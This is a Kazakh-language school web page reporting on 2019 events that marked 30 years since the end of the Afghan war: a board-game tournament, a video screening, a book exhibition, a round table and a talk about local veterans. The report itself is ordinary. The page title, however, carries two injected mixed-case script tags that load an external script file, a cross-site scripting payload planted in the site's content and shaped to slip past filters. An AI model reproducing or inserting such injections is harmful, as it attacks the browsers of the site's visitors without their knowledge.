Ауған соғысының аяқталуына 30 жыл<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.02.2019

 

Ауған соғысының аяқталуының 30 жылдығына арналған

мектепішілік іс-шаралар жоспарының есебі

2018-2019 оқу жылы

Ауған соғысының аяқталуының 30 жылдығына арналған мектепішілік іс-шаралар жоспары бекітіліп, қаңтардың 16-нан ақпанның 15-сі аралығында өткізілді.  Жоспарға сәйкес 21-нші қаңтарда дене шынықтыру пәнінің мұғалімі Болатхан Амангельды 5-10 сыныптар арасында тоғыз құмалақ, шахмат ойындарынан мектепішілік спорттық сайыс өткізді.  Бұл сайыс Ауған соғысы ардагерлер құрметіне орай ұйымдастырылды.

28-ші  қаңтарда АӘД пәнінің мұғалімі 1-10 сыныптар оқушыларына

 «Ауған соғысының қасіреттері»  атты тақырыпта бейнеролик көрсетті. Мақсаты бейнеролик көрсетілімі арқылы ауған соғысының зардаптарын оқушыларға жеткізе отырып,  олардың бойына өз елі мен жерін сүюге тәрбиелеу болып табылады.

16-шы қаңтардан 15-нші ақпанға дейін мектеп кітапханашысы1-10 сыныптар арасында «Ауған соғысы ардагерлеріне тағзым» атты кітап көрмесін ұйымдастырды. Мектеп оқушылары кітап көрмесіне қойылған кітаптар арқылы ауған соғысы туралы көптеген мәліметтерге қанықты.

11-нші ақпанда АӘД пәнінің мұғалімі 8-10 сынып оқушыларымен  «Ауған соғысының тарихта алатын орны» атты  дөңгелек үстел өткізді. Дөңгелек үстел барысында оқушылар Ауған соғысының тарихтағы алатын орнын жан-жақты талдай отырып, өзара пікір алмасты.

15-нші ақпанда тарих мұғалімі 5-10 сыныптар арасында «Ақкөл ауданынан шыққан ауған соғысы ардагерлерін білеміз бе?»  атты деректі баяндама жасады. Сондай-ақ бұл күні айлықты қорытындылай келе  мектеп әкімшілігі тарапынан белсенді қатысқан оқушыларға және ұйымдастырған АӘД пәнінің мұғаліміне алғыс жарияланды.

Орындаған: АӘД мұғалімі Кажибаев А.К.

 

 

Просмотров: 651


Пікір қосу



Деректерді қолтаңбаға қосу